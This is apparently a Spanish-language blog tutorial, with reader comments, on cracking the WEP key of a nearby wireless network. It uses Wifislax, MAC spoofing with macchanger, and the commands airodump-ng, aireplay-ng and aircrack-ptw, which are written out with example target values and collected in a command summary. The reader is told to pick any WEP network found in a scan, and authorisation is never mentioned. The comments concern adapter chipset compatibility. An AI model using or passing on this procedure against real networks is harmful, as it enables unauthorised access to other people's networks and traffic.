REQUISITOS:
-PC
-Wifislax 3.1
-Tarjeta de red inalámbrica con chipset compatible
En este ejemplo se utiliza una tarjeta de red inalámbrica USB, TP-LINK (54Mbps|TL-WN321G)
Hay otras tarjetas que pueden servir. Aqui la Lista de chipsets compatibles (Traduccion)
PROCEDIMIENTO:
Abrir Wifislax
Conectar la tarjeta USB. Ir al menu Dispositivos-> Dispositivos USB y seleccionar Ralink 54M.USB....
Se detectara el dispositivo e intalara unos drivers de VirtualBox, es posible que se tenga que desconectar y volver a conectar la tarjeta USB.
Al seleccionar la tarjeta aparecera marcada
Abrir Terminal (Shell) y escribir el siguiente comando para verificar que se detecto la tarjeta
iwconfig
El dispositivo es rausb0. (cerrar esta ventana)
Ir al Menu
Wifislax -> Asistencia chipset -> Asistencia chipset Ralink -> Forzar ralink rt73 sobre rt2570 y saldra esto (cerrar esta ventana)
Wifislax -> Herramientas Wireless -> macchanger
Seleccionar el dispositivo rausb0 y presionar Aplicar
Presionar OK
Cerrar la ventana que indica que se ha cambiado la MAC
Abrir otra ventana Shell, escribir el siguiente comando para escanear y filtrar las redes con encriptacion WEP
airodump-ng --encrypt WEP rausb0
Se desplagara una lista con las redes encontradas, de cada red se incluye estos datos
BSSID (Direccion MAC), #Data (Datos capturados), CH (Canal), ESSID (Nombre de la red), etc.
De acuerdo a la lista escojer alguna y anotar el BSSID, CH y ESSID. Para detener el escaneo presionar las teclas Ctlr+C
Ahora ejecutar el siguiente comando
airodump-ng --bssid [BSSID] -c[CH] -w capturas rausb0
sustituyendo los valores de BSSID y CH quedaria de la siguiente manera
airodump-ng --bssid B8:A3:86:AA:41:50 -c11 -w capturas rausb0
Hay que estar atento a la columna de #Data es necesario llegar a 100,000 para poder sacar la clave. Para acelerar el proceso es necesario hacer una asociacion e inyectar paquetes con el siguiente comando en otra ventana Shell.
aireplay-ng -1 30 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 rausb0
Sustituyendo los valores de ESSID y BSSID quedaria de la siguiente manera
aireplay-ng -1 30 -e Megared4150 -a B8:A3:86:AA:41:50 -h 00:11:22:33:44:55 rausb0
Enseguida en otra ventana de Shell este otro comando
aireplay-ng -3 -x600 -b [BSSID] -h 00:11:22:33:44:55 rausb0
Sustituyendo el valor de BSSID quedaria de la siguiente manera
aireplay-ng -3 -x600 -b B8:A3:86:AA:41:50 -h 00:11:22:33:44:55 rausb0
Solo hay que esperar a que #Data llegue a los 100,000 depues ejecutar este comando en otra ventana Shell
aircrack-ptw capturas
Con esto se mostrara la clave, cualquiera que sea, no necesariamente la contraseña de fabrica.
RESUMEN DE COMANDOS:
Buscar redes con encriptacion WEP:
airodump-ng --encrypt WEP rausb0
Capturar paquetes de una red:
airodump-ng --bssid [BSSID] -c[CH] -w capturas rausb0
Asociar red:
aireplay-ng -1 30 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 rausb0
Inyectar paquetes:
aireplay-ng -3 -x600 -b [BSSID] -h 00:11:22:33:44:55 rausb0
Desifrar clave
aircrack-ptw capturas
El tiempo de este proceso puede variar, me ha tomado desde 10 minutos hasta 1 hora en desifrar una clave. depende de varios factores. Si no se logra inyectar paquetes puede llevar dias desifrar una clave. por eso es importarte tener una tarjeta que lo permita.
hola me pddrias ayudar :/ !
ReplyDeletecuando ejecuto wifislax ! y agrego mi tarjeta de wifi! y queda marcada! pero cuando veo si se instalo! me marca
wireless no encontrado :/ !
sera mi targeta? es esta: http://www.google.com.mx/imgres?start=223&hl=es-419&sa=X&tbo=d&biw=1280&bih=909&tbm=isch&tbnid=es5lLo7H-nZqUM:&imgrefurl=http://www.gamesalor.com/product_3510_New-150mbps-Wifi-USB-Wireless-LAN-Adapter-802.11-B-g-n.ashx&docid=X7l-VUH9zems-M&imgurl=http://www.gamesalor.com/image_dianzi1/d3/8355/1.jpg_300x300.ashx&w=300&h=300&ei=62b9UOP5IKTKiwLNiYDYBg&zoom=1&iact=hc&vpx=142&vpy=462&dur=4441&hovh=225&hovw=225&tx=170&ty=122&sig=110068456597564745364&page=6&tbnh=136&tbnw=128&ndsp=45&ved=1t:429,r:24,s:200,i:76
no se si es compatible :/ !
Solo pude ver una foto, ¿que modelo es? ¿Ejecutas wifislax con Virtualbox o con boot al prender la computadora?
ReplyDelete¿Usaste el comando iwconfig en la terminal?
es una wirelees usb land card! modelo 802.11n
ReplyDeletey lo ejucuto con el virtualbox.!
y cuando uso el comando iwconfig en sell! me sale 2 descripciones!
que dise wirellees no encontrado :/ !
y si desconecto la targeta! y vuelvo a escribir el comando! me sale con el mismo error! que cuando la tengo instalada :/ !
sera compatible??
ReplyDeleteNueva 150mbps Wifi USB adaptador de LAN inalámbrica 802.11 b / g / n
LAN transferencia de datos clasifica Quick Secure Setup,
Cumple con WPS para la preocupación de seguridad inalámbrica gratuita
Configuración sencilla y monitoreo Soporta Roaming tecnología, garantizando eficientes conexiones inalámbricas.
Este soporte tarjeta inalámbrica todo Chipset Sistema operativo (RT3070): Mac, Linux, Windows: 32 bits: Windows 2000, XP, Vista, Windows 7 Windows : 64 bits: Windows XP 64bit, Windows Vista 64bit, Windows 7 64bit USB 802.11N 150M LAN INALÁMBRICA adaptador con antena desmontable (Chipset RT3070) Apoyo 64/128-bit WEP, cumple con 128 bits estándar WPA (TKIP / AES), soporta MIC, Expansión IV, autenticación de clave compartida, IEEE 802.1X soporta 150/54/48/36 / 24/18/12/9/6/11/5.5/2/1 Mbps Wireless LAN, velocidad de transferencia de datos Quick Secure Setup, cumple con WPS para la preocupación de Libre Configuración de seguridad inalámbrica simple y monitoreo Soporta Roaming tecnología, garantizando eficientes conexiones inalámbricas. Con antena desmontable Max transmitir rango: Interior: 100m, Exterior: 300m paquete: 1 x USB adaptador inalámbrico, 1 x antena 1 x CD driver.
Tu tarjeta es chipset RT3070, no es sopostado por wifislax, tendrias que actualizar el kernel y descargar los drivers por separado e instalarlos, algo muy dificil de lograr.
ReplyDeleteTe recomiendo usar Beini, es otra distribucion de Linux para Auditoria Web, muy completo que incluye los drivers de tu tarjeta.
Otra opcion puede ser BackTrack